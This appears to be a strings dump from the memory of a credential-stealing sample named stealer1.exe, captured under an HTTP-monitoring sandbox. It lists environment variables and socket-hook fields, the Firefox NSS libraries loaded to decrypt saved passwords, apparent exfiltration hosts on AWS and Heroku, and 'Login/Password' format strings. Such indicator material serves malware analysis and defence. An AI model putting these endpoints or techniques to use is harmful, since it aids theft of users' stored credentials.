- 0x461942 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x461988 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x4619ad (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x4619e4 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x461a38 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x461a74 (22): NUMBER_OF_PROCESSORS=4
- 0x461a8b (13): OS=Windows_NT
- 0x461a99 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x461b3b (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x461b79 (26): PROCESSOR_ARCHITECTURE=x86
- 0x461b94 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x461bb1 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x461bfa (17): PROCESSOR_LEVEL=6
- 0x461c0c (23): PROCESSOR_REVISION=9e09
- 0x461c24 (26): ProgramData=C:\ProgramData
- 0x461c3f (35): ProgramFiles=C:\Program Files (x86)
- 0x461c63 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x461c8c (29): ProgramW6432=C:\Program Files
- 0x461caa (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x461ceb (22): PUBLIC=C:\Users\Public
- 0x461d02 (19): SESSIONNAME=Console
- 0x461d16 (14): SystemDrive=C:
- 0x461d25 (21): SystemRoot=C:\Windows
- 0x461d3b (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x461d5e (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x461d80 (12): USERDOMAIN=O
- 0x461d8d (10): USERNAME=A
- 0x461d98 (22): USERPROFILE=C:\Users\A
- 0x461daf (17): windir=C:\Windows
- 0x461dc1 (23): windows_tracing_flags=3
- 0x461dd9 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x461eb1 (15): )%w )%w@)%w`)%w
- 0x461ed1 (15): *%w *%w@*%w`*%w
- 0x461ef1 (15): +%w +%w@+%w`+%w
- 0x8b09f8 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x8b0a17 (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x8b0a3a (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x8b0a71 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x8b0aad (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x8b0ade (14): COMPUTERNAME=O
- 0x8b0aed (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x8b0b11 (19): FP_NO_HOST_CHECK=NO
- 0x8b0b25 (12): HOMEDRIVE=C:
- 0x8b0b32 (17): HOMEPATH=\Users\A
- 0x8b0b44 (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x8b0b6a (15): LOGONSERVER=\\O
- 0x8b0b7a (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x8b0bc0 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x8b0be5 (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x8b0c1c (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x8b0c70 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x8b0cac (22): NUMBER_OF_PROCESSORS=4
- 0x8b0cc3 (13): OS=Windows_NT
- 0x8b0cd1 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x8b0d73 (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x8b0db1 (26): PROCESSOR_ARCHITECTURE=x86
- 0x8b0dcc (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x8b0de9 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x8b0e32 (17): PROCESSOR_LEVEL=6
- 0x8b0e44 (23): PROCESSOR_REVISION=9e09
- 0x8b0e5c (26): ProgramData=C:\ProgramData
- 0x8b0e77 (35): ProgramFiles=C:\Program Files (x86)
- 0x8b0e9b (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x8b0ec4 (29): ProgramW6432=C:\Program Files
- 0x8b0ee2 (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x8b0f23 (22): PUBLIC=C:\Users\Public
- 0x8b0f3a (19): SESSIONNAME=Console
- 0x8b0f4e (14): SystemDrive=C:
- 0x8b0f5d (21): SystemRoot=C:\Windows
- 0x8b0f73 (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x8b0f96 (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x8b0fb8 (12): USERDOMAIN=O
- 0x8b0fc5 (10): USERNAME=A
- 0x8b0fd0 (22): USERPROFILE=C:\Users\A
- 0x8b0fe7 (17): windir=C:\Windows
- 0x8b0ff9 (23): windows_tracing_flags=3
- 0x8b1011 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x8b1566 (26):
- 0x8b15e4 (24):
- 0x8b15fd (8):
- 0x8b1646 (26): abcdefghijklmnopqrstuvwxyz
- 0x8b1666 (26): ABCDEFGHIJKLMNOPQRSTUVWXYZ
- 0x8b1718 (31): C:\Users\A\Desktop\stealer1.exe
- 0x8b1850 (30): ALLUSERSPROFILE=C:\ProgramData
- 0x8b186f (34): APPDATA=C:\Users\A\AppData\Roaming
- 0x8b1892 (54): CommonProgramFiles=C:\Program Files (x86)\Common Files
- 0x8b18c9 (59): CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
- 0x8b1905 (48): CommonProgramW6432=C:\Program Files\Common Files
- 0x8b1936 (14): COMPUTERNAME=O
- 0x8b1945 (35): ComSpec=C:\Windows\system32\cmd.exe
- 0x8b1969 (19): FP_NO_HOST_CHECK=NO
- 0x8b197d (12): HOMEDRIVE=C:
- 0x8b198a (17): HOMEPATH=\Users\A
- 0x8b199c (37): LOCALAPPDATA=C:\Users\A\AppData\Local
- 0x8b19c2 (15): LOGONSERVER=\\O
- 0x8b19d2 (69): MpConfig_ProductAppDataPath=C:\ProgramData\Microsoft\Windows Defender
- 0x8b1a18 (36): MpConfig_ProductCodeName=AntiSpyware
- 0x8b1a3d (54): MpConfig_ProductPath=C:\Program Files\Windows Defender
- 0x8b1a74 (83): MpConfig_ProductUserAppDataPath=C:\Users\A\AppData\Local\Microsoft\Windows Defender
- 0x8b1ac8 (59): MpConfig_ReportingGUID=8C765C2A-C3FC-4C7B-ABC6-72E8D7028CEB
- 0x8b1b04 (22): NUMBER_OF_PROCESSORS=4
- 0x8b1b1b (13): OS=Windows_NT
- 0x8b1b29 (161): Path=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\
- 0x8b1bcb (61): PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
- 0x8b1c09 (26): PROCESSOR_ARCHITECTURE=x86
- 0x8b1c24 (28): PROCESSOR_ARCHITEW6432=AMD64
- 0x8b1c41 (72): PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 158 Stepping 9, GenuineIntel
- 0x8b1c8a (17): PROCESSOR_LEVEL=6
- 0x8b1c9c (23): PROCESSOR_REVISION=9e09
- 0x8b1cb4 (26): ProgramData=C:\ProgramData
- 0x8b1ccf (35): ProgramFiles=C:\Program Files (x86)
- 0x8b1cf3 (40): ProgramFiles(x86)=C:\Program Files (x86)
- 0x8b1d1c (29): ProgramW6432=C:\Program Files
- 0x8b1d3a (64): PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\
- 0x8b1d7b (22): PUBLIC=C:\Users\Public
- 0x8b1d92 (19): SESSIONNAME=Console
- 0x8b1da6 (14): SystemDrive=C:
- 0x8b1db5 (21): SystemRoot=C:\Windows
- 0x8b1dcb (34): TEMP=C:\Users\A\AppData\Local\Temp
- 0x8b1dee (33): TMP=C:\Users\A\AppData\Local\Temp
- 0x8b1e10 (12): USERDOMAIN=O
- 0x8b1e1d (10): USERNAME=A
- 0x8b1e28 (22): USERPROFILE=C:\Users\A
- 0x8b1e3f (17): windir=C:\Windows
- 0x8b1e51 (23): windows_tracing_flags=3
- 0x8b1e69 (69): windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log
- 0x8b1eb9 (15): e,t0e,tPe,tpe,t
- 0x8b1ed9 (15): f,t0f,tPf,tpf,t
- 0x8b1ef9 (15): g,t0g,tPg,tpg,t
- 0x9008c0 (64): C:\Windows\System32\fwpuclnt.dll
- 0x900998 (84): @%SystemRoot%\System32\wshtcpip.dll,-60100
- 0x900b9c (66): %SystemRoot%\system32\mswsock.dll
- 0x900e38 (84): @%SystemRoot%\System32\wshtcpip.dll,-60101
- 0x90103c (66): %SystemRoot%\system32\mswsock.dll
- 0x9012d8 (84): @%SystemRoot%\System32\wshtcpip.dll,-60102
- 0x9014dc (66): %SystemRoot%\system32\mswsock.dll
- 0x901778 (80): @%SystemRoot%\System32\wship6.dll,-60100
- 0x90197c (66): %SystemRoot%\system32\mswsock.dll
- 0x901c18 (80): @%SystemRoot%\System32\wship6.dll,-60101
- 0x901e1c (66): %SystemRoot%\system32\mswsock.dll
- 0x9020b8 (80): @%SystemRoot%\System32\wship6.dll,-60102
- 0x9022bc (66): %SystemRoot%\system32\mswsock.dll
- 0x902558 (76): @%SystemRoot%\System32\wshqos.dll,-100
- 0x90275c (66): %SystemRoot%\system32\mswsock.dll
- 0x9029f8 (76): @%SystemRoot%\System32\wshqos.dll,-101
- 0x902bfc (66): %SystemRoot%\system32\mswsock.dll
- 0x902e98 (76): @%SystemRoot%\System32\wshqos.dll,-102
- 0x90309c (66): %SystemRoot%\system32\mswsock.dll
- 0x903338 (76): @%SystemRoot%\System32\wshqos.dll,-103
- 0x90353c (66): %SystemRoot%\system32\mswsock.dll
- 0x903788 (64): %SystemRoot%\system32\NLAapi.dll
- 0x9038c8 (76): @%SystemRoot%\System32\wshqos.dll,-103
- 0x9039a0 (78): @%SystemRoot%\system32\nlasvc.dll,-1000
- 0x903a30 (66): %SystemRoot%\system32\napinsp.dll
- 0x903c48 (80): @%SystemRoot%\system32\napinsp.dll,-1000
- 0x903ce0 (66): %SystemRoot%\system32\pnrpnsp.dll
- 0x903ef8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1000
- 0x903fa0 (66): %SystemRoot%\system32\pnrpnsp.dll
- 0x9041b8 (80): @%SystemRoot%\system32\pnrpnsp.dll,-1001
- 0x904260 (66): %SystemRoot%\System32\mswsock.dll
- 0x904478 (84): @%SystemRoot%\system32\wshtcpip.dll,-60103
- 0x904520 (64): %SystemRoot%\System32\winrnr.dll
- 0x904a98 (40): MSAFD Tcpip [TCP/IP]
- 0x904b60 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
- 0x904bc8 (26): api.ipify.org
- 0x904ca0 (40): MSAFD Tcpip [UDP/IP]
- 0x904ea8 (40): MSAFD Tcpip [RAW/IP]
- 0x9050b0 (44): MSAFD Tcpip [TCP/IPv6]
- 0x9052b8 (44): MSAFD Tcpip [UDP/IPv6]
- 0x9054c0 (44): MSAFD Tcpip [RAW/IPv6]
- 0x9056c8 (54): RSVP TCPv6 Service Provider
- 0x9058d0 (50): RSVP TCP Service Provider
- 0x905ad8 (54): RSVP UDPv6 Service Provider
- 0x905ce0 (50): RSVP UDP Service Provider
- 0x9d3498 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0x9d34ec (18): stealer1.exe[2956]
- 0x9d3500 (15): CurrentThreadID
- 0x9d3515 (11): NotifyType
- 0x9d3524 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0x9d3555 (14): RemoteAddress
- 0x9d3567 (12): SocketHandle
- 0x9d357a (12): LocalAddress
- 0x9d358a (14): DLLNotifyEvent
- 0x9d359b (14): ConnectHandle
- 0x9d35b0 (15): Socket_IsSecure
- 0x9d35c2 (15): Socket_DataSize
- 0x9d35d8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0x9d3606 (15): RequestComplete
- 0x9d361c (15): ReceiveLastByte
- 0x9d3631 (14): SendFirstByte
- 0x9d3646 (14): DNSLookUpStart
- 0x9d365b (16): ReceiveFirstByte
- 0x9d3672 (12): SendLastByte
- 0x9d3684 (10): StartTick
- 0x9d3695 (12): ConnectStart
- 0x9d36a9 (12): qh.MemStream
- 0x9d36b6 (6): Z*s5C[
- 0x9d3759 (6): ^jszM"
- 0x9d37d2 (7): XDDfs:O
- 0x9d3a0b (6): 7b0G2N
- 0x9da6c8 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0x9da71c (18): stealer1.exe[2956]
- 0x9da730 (15): CurrentThreadID
- 0x9da745 (11):
- NotifyType
- 0x9da754 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0x9da785 (14):
- RemoteAddress
- 0x9da7aa (12): LocalAddress
- 0x9da7ba (14): DLLNotifyEvent
- 0x9da7cb (14):
- ConnectHandle
- 0x9da7e0 (15): Socket_IsSecure
- 0x9da7f2 (15): Socket_DataSize
- 0x9da808 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0x9da836 (15): RequestComplete
- 0x9da84c (15): ReceiveLastByte
- 0x9da861 (14):
- SendFirstByte
- 0x9da876 (14): DNSLookUpStart
- 0x9da88b (16): ReceiveFirstByte
- 0x9da8a2 (12): SendLastByte
- 0x9da8b4 (10): StartTick
- 0x9da8c5 (12): ConnectStart
- 0x9da8d9 (12): qh.MemStream
- 0x9db2a8 (7): imeTick
- 0x9db2ba (11): RequestGUID
- 0x9db2c6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
- 0x9db2ef (11): ProcessName
- 0x9db2fc (18): stealer1.exe[2956]
- 0x9db310 (15): CurrentThreadID
- 0x9db325 (11):
- NotifyType
- 0x9db334 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0x9db365 (14):
- RemoteAddress
- 0x9db377 (12): SocketHandle
- 0x9db38a (12): LocalAddress
- 0x9db39a (14): DLLNotifyEvent
- 0x9db3ab (14):
- ConnectHandle
- 0x9db3c0 (15): Socket_IsSecure
- 0x9db3d2 (15): Socket_DataSize
- 0x9db3e8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0x9db416 (15): RequestComplete
- 0x9db42c (15): ReceiveLastByte
- 0x9db441 (14):
- SendFirstByte
- 0x9db456 (14): DNSLookUpStart
- 0x9db46b (16): ReceiveFirstByte
- 0x9db482 (12): SendLastByte
- 0x9db494 (10): StartTick
- 0x9db4a5 (12): ConnectStart
- 0x9db4b9 (12): qh.MemStream
- 0x9e25f8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24296
- 0x9e4cf8 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $7574129d
- 0x9e9928 (100): NamedBuffer, mAH, Process $00000b8c, API $76d24296
- 0x9ec028 (114): Global\NamedBuffer, mAH, Process $00000b8c, API $76d24406
- 0x9f0158 (100): NamedBuffer, mAH, Process $00000b8c, API $76d26f01
- 0x9f79b0 (74): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0xa05ae8 (100): NamedBuffer, mix, Process $00000b8c, API $76d26f01
- 0xa1b6d8 (38): \RPC Control\mchIpcHttpAnalyzer_StdV71
- 0xa1b738 (37): \RPC Control\mchIpcHttpAnalyzer_StdV7
- 0xa1b75e (38): HttpAnalyzer_StdV71
- 0xa24f23 (12): freebl3.dll
- 0xa24f80 (12): mozglue.dll
- 0xa24fdd (9): nss3.dll
- 0xa25037 (13): softokn3.dll
- 0xa25095 (12): nssdbm3.dll
- 0xa2524e (9): WN!ybu $h
- 0xa25291 (6): Y#F2:k
- 0xa252b8 (7): imeTick
- 0xa252ca (11): RequestGUID
- 0xa252d6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
- 0xa252ff (11): ProcessName
- 0xa2530c (18): stealer1.exe[2956]
- 0xa25320 (15): CurrentThreadID
- 0xa25335 (11):
- NotifyType
- 0xa25344 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0xa25375 (14):
- RemoteAddress
- 0xa25387 (12): SocketHandle
- 0xa2539a (12): LocalAddress
- 0xa253aa (14): DLLNotifyEvent
- 0xa253bb (14):
- ConnectHandle
- 0xa253d0 (15): Socket_IsSecure
- 0xa253e2 (15): Socket_DataSize
- 0xa253f8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0xa25426 (15): RequestComplete
- 0xa2543c (15): ReceiveLastByte
- 0xa25451 (14):
- SendFirstByte
- 0xa25466 (14): DNSLookUpStart
- 0xa2547b (16): ReceiveFirstByte
- 0xa25492 (12): SendLastByte
- 0xa254a4 (10): StartTick
- 0xa254b5 (12): ConnectStart
- 0xa254c9 (12): qh.MemStream
- 0xa27d7b (12): freebl3.dll
- 0xa27dd8 (12): mozglue.dll
- 0xa27e35 (9): nss3.dll
- 0xa27e8f (13): softokn3.dll
- 0xa27eed (12): nssdbm3.dll
- 0xa27f34 (30): pAnalyzer_StdV7
- 0xa29b1d (6): Qkkbal
- 0xa46818 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
- 0xa46898 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
- 0xa468d8 (50): NamedBuffer, mAH, Process $00000b8c, API $7574129d
- 0xa46918 (50): NamedBuffer, mAH, Process $00000b8c, API $71ac0000
- 0xa4da58 (55): Software\IEInspectorSoft\HTTPAnalyzerStd\7.x\Properties
- 0xa5c028 (9): Disk full
- 0xa5c070 (7): January
- 0xa5c088 (8): February
- 0xa5c100 (6): August
- 0xa5c118 (9): September
- 0xa5c130 (7): October
- 0xa5c148 (8): November
- 0xa5c160 (8): December
- 0xa5c178 (6): Sunday
- 0xa5c190 (6): Monday
- 0xa5c1a8 (7): Tuesday
- 0xa5c1c0 (9): Wednesday
- 0xa5c1d8 (8): Thursday
- 0xa5c1f0 (6): Friday
- 0xa5c208 (8): Saturday
- 0xa5c220 (8): M/d/yyyy
- 0xa5c238 (9): h:mm AMPM
- 0xa5c550 (9): Exception
- 0xa5c568 (6): EAbort
- 0xa5c580 (11): EInOutError
- 0xa5c598 (9): EIntError
- 0xa5c5b0 (10): EDivByZero
- 0xa5c5c8 (11): ERangeError
- 0xa5c5e0 (10): EMathError
- 0xa5c5f8 (10): EInvalidOp
- 0xa5c610 (11): EZeroDivide
- 0xa5c628 (9): EOverflow
- 0xa5c640 (10): EUnderflow
- 0xa5c658 (10): EPrivilege
- 0xa5c670 (9): EControlC
- 0xa5c688 (11): EFOpenError
- 0xa5c6a0 (11): EFilerError
- 0xa5c6b8 (10): EReadError
- 0xa5c6d0 (11): EWriteError
- 0xa5c6e8 (10): EListError
- 0xa5c700 (10): EBitsError
- 0xa5c718 (7): EThread
- 0xa5c730 (9): EParseCSV
- 0xa5c7f0 (11): qh.IntfList
- 0xa5c820 (10): qh.HashMap
- 0xa5c880 (7): qh.List
- 0xa5c8f8 (10): qh.HashSet
- 0xa5ca30 (10): ws2_32.dll
- 0xa5ca78 (7): WSARecv
- 0xa5ca90 (11): wsock32.dll
- 0xa5caa8 (11): wsock32.dll
- 0xa5cac0 (11): secur32.dll
- 0xa5cb08 (11): wsock32.dll
- 0xa5cb20 (7): WSASend
- 0xa5cb38 (11): wsock32.dll
- 0xa5cb50 (10): ws2_32.dll
- 0xa5cb68 (10): ws2_32.dll
- 0xa5cb80 (10): ws2_32.dll
- 0xa5cb98 (9): SSL_write
- 0xa5cbb0 (7): WSARecv
- 0xa5cbc8 (10): ws2_32.dll
- 0xa5cbe0 (7): connect
- 0xa5cbf8 (7): WSASend
- 0xa5cc10 (11): secur32.dll
- 0xa5cc28 (10): ws2_32.dll
- 0xa5cc40 (10): ws2_32.dll
- 0xa5cc58 (10): ws2_32.dll
- 0xa5cc70 (11): getaddrinfo
- 0xa5cc88 (10): WSAConnect
- 0xa5cca0 (11): wininet.dll
- 0xa5ccb8 (8): SSL_read
- 0xa5cce8 (8): 2956.576
- 0xa5cd00 (10): NotifyType
- 0xa5cd30 (11): ProcessName
- 0xa5cd60 (8): TimeTick
- 0xa5cd78 (11): RequestGUID
- 0xa5cd90 (9): StartTick
- 0xa63358 (41): Variant or safe array index out of bounds
- 0xa63390 (36): Error creating variant or safe array
- 0xa64200 (39): wINetIPCMsgs.TwiWebPageNotifyParamsIMPL
- 0xa64270 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
- 0xa642e0 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0xa644a0 (38): {C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
- 0xa64628 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0xa64820 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
- 0xa6a688 (16): Assertion failed
- 0xa6a6a8 (16): Invalid argument
- 0xa6a6c8 (14): Stack overflow
- 0xa6a6e8 (13): Control-C hit
- 0xa6a708 (16): Access violation
- 0xa6a728 (16): Integer overflow
- 0xa6a748 (17): Range check error
- 0xa6a768 (16): Division by zero
- 0xa6a788 (18): File access denied
- 0xa6a7a8 (19): Too many open files
- 0xa6a7c8 (16): Invalid filename
- 0xa6a7e8 (14): File not found
- 0xa6a808 (13): Out of memory
- 0xa6a828 (14): Service Pack 1
- 0xa6a848 (19): dddd, MMMM dd, yyyy
- 0xa6a868 (12): h:mm:ss AMPM
- 0xa6a888 (15): TInvokableClass
- 0xa6a8a8 (15): TSoapDataModule
- 0xa6a8c8 (17): TSOAPDOMProcessor
- 0xa6a8e8 (12): THTTPReqResp
- 0xa6a908 (12): TXMLDocument
- 0xa6a948 (19): C:\Windows\system32
- 0xa6ab68 (12): EInvalidCast
- 0xa6aba8 (13): EConvertError
- 0xa6abe8 (13): EVariantError
- 0xa6ac28 (13): EPropReadOnly
- 0xa6ac68 (14): EPropWriteOnly
- 0xa6aca8 (16): EAssertionFailed
- 0xa6ace8 (14): EAbstractError
- 0xa6ad28 (14): EIntfCastError
- 0xa6ad68 (17): EInvalidContainer
- 0xa6ada8 (14): EInvalidInsert
- 0xa6ade8 (13): EPackageError
- 0xa6ae28 (18): ESafecallException
- 0xa6ae68 (18): EExternalException
- 0xa6af08 (12): EIntOverflow
- 0xa6afe8 (16): EAccessViolation
- 0xa6b048 (14): EStackOverflow
- 0xa6b0a8 (12): EStreamError
- 0xa6b0e8 (13): EFCreateError
- 0xa6b1a8 (14): EClassNotFound
- 0xa6b1e8 (15): EMethodNotFound
- 0xa6b228 (13): EInvalidImage
- 0xa6b268 (12): EResNotFound
- 0xa6b2e8 (16): EStringListError
- 0xa6b328 (15): EComponentError
- 0xa6b368 (12): EParserError
- 0xa6b3a8 (15): EOutOfResources
- 0xa6b3e8 (17): EInvalidOperation
- 0xa6b448 (13): EqhValidation
- 0xa6b488 (12): qh.MemStream
- 0xa6b4a8 (14): qh.IntfHashMap
- 0xa6b4c8 (13): qh.StringList
- 0xa6b4e8 (17): qh.VectorIterator
- 0xa6b508 (19): qh.IntfListIterator
- 0xa6b528 (14): qh.IntfHashSet
- 0xa6b568 (18): stealer1.exe[2956]
- 0xa6b5c8 (18): HttpAnalyzer_StdV7
- 0xa6b5e8 (19): HttpAnalyzer_StdV71
- 0xa6b608 (14): DecryptMessage
- 0xa6b628 (14): EncryptMessage
- 0xa6b648 (13): gethostbyname
- 0xa6b668 (16): InternetConnectA
- 0xa6b6a8 (12): ssleay32.dll
- 0xa6b6c8 (12): ssleay32.dll
- 0xa6b6e8 (12): kernel32.dll
- 0xa6b708 (15): HttpsSendBuffer
- 0xa6b7a8 (18): HttpAnalyzer_StdV7
- 0xa6b808 (12): LocalAddress
- 0xa6b828 (12): qh.MemStream
- 0xa6b848 (12): SocketHandle
- 0xa6b868 (14): DLLNotifyEvent
- 0xa6b888 (12): qh.MemStream
- 0xa6b8a8 (18): HttpAnalyzer_StdV7
- 0xa6b8c8 (13): RemoteAddress
- 0xa6b8e8 (19): \RPC Control\mchIpc
- 0xa6b908 (16): ReceiveFirstByte
- 0xa6b928 (15): ReceiveLastByte
- 0xa6b948 (15): RequestComplete
- 0xa6b968 (14): DNSLookUpStart
- 0xa6b988 (13): SendFirstByte
- 0xa6b9a8 (15): ReceiveLastByte
- 0xa6b9c8 (15): RequestComplete
- 0xa719b8 (23): Interface not supported
- 0xa719e0 (21): External exception %x
- 0xa71a08 (25): Invalid variant operation
- 0xa71a30 (22): Privileged instruction
- 0xa71a58 (22): Invalid class typecast
- 0xa71a80 (24): Floating point underflow
- 0xa71aa8 (23): Floating point overflow
- 0xa71ad0 (21): Invalid numeric input
- 0xa71af8 (23): Read beyond end of file
- 0xa71b20 (25): Invalid pointer operation
- 0xa721b0 (22): qh.StreamableException
- 0xa721d8 (20): qh.SimplePropertyBag
- 0xa72200 (24): wINetTypes.TwiNotifyImpl
- 0xa72340 (20): ws2_32.dll
- 0xa72390 (22): wsock32.dll
- 0xa723b8 (24): ssleay32.dll
- 0xa723e0 (22): wsock32.dll
- 0xa72408 (24): ssleay32.dll
- 0xa72430 (20): ws2_32.dll
- 0xa72458 (20): ws2_32.dll
- 0xa72480 (20): ws2_32.dll
- 0xa724a8 (20): ws2_32.dll
- 0xa724f8 (22): WSAGetOverlappedResult
- 0xa72520 (20): ws2_32.dll
- 0xa72548 (20): ws2_32.dll
- 0xa72570 (20): ws2_32.dll
- 0xa72598 (22): wininet.dll
- 0xa725c0 (22): secur32.dll
- 0xa725e8 (22): secur32.dll
- 0xa72610 (22): wsock32.dll
- 0xa72638 (22): wsock32.dll
- 0xa726b0 (25): GetQueuedCompletionStatus
- 0xa72700 (24): kernel32.dll
- 0xa72840 (20): ProcessIdToSessionId
- 0xa78ce8 (28): Exception in safecall method
- 0xa78d18 (34): Variant method calls not supported
- 0xa78d48 (31): Invalid variant type conversion
- 0xa78d78 (31): Floating point division by zero
- 0xa78da8 (32): Invalid floating point operation
- 0xa78f58 (35): wINetIPCMsgs.TwiDLLNotifyParamsImpl
- 0xa78f88 (35): wINetIPCMsgs.TwiLogNotifyParamsIMPL
- 0xb00850 (124): Global\BFE_Notify_Event_{97b51811-6670-4505-8b2a-5b63fedd33c9}
- 0xbc07ea (12): Psched
- 0xbc08e4 (12): Tcpip6
- 0xbc0b54 (40): MSAFD Tcpip [TCP/IP]
- 0xbc0b7e (42): 2\wshtcpip.dll,-60100
- 0xbc0dc8 (40): MSAFD Tcpip [UDP/IP]
- 0xbc0df2 (42): 2\wshtcpip.dll,-60101
- 0xbc103c (40): MSAFD Tcpip [RAW/IP]
- 0xbc1066 (42): 2\wshtcpip.dll,-60102
- 0xbc12b0 (44): MSAFD Tcpip [TCP/IPv6]
- 0xbc12de (34): wship6.dll,-60100
- 0xbc1524 (44): MSAFD Tcpip [UDP/IPv6]
- 0xbc1552 (34): wship6.dll,-60101
- 0xbc1798 (44): MSAFD Tcpip [RAW/IPv6]
- 0xbc17c6 (34): wship6.dll,-60102
- 0xbc1a0c (54): RSVP TCPv6 Service Provider
- 0xbc1a44 (20): s.dll,-100
- 0xbc1c80 (50): RSVP TCP Service Provider
- 0xbc1cb4 (24): qos.dll,-101
- 0xbc1ef4 (54): RSVP UDPv6 Service Provider
- 0xbc1f2c (20): s.dll,-102
- 0xbc2168 (50): RSVP UDP Service Provider
- 0xbc219c (24): qos.dll,-103
- 0xc64818 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
- 0xc648ea (14): Q!1AQaq
- 0xf701d8 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
- 0xf702aa (14): Q!1AQaq
- 0x1080864 (26): api.ipify.org
- 0x1080b78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080bf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080c78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080cf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080d78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080df8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080e78 (44): no-19599.herokussl.com
- 0x1080ec0 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
- 0x1080f48 (18): ipify.org
- 0x1080f80 (52): nagano-19599.herokussl.com
- 0x2e6f26f (6): ws#
- ul
- 0x71b00025 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
- 0x71b00345 (6): 8LdrLu
- 0x7ffe0030 (20): d:\Windows
- Login: %s
- Password: %s
- templogin Login Data %s\%s templogin ERROR Don't copy string
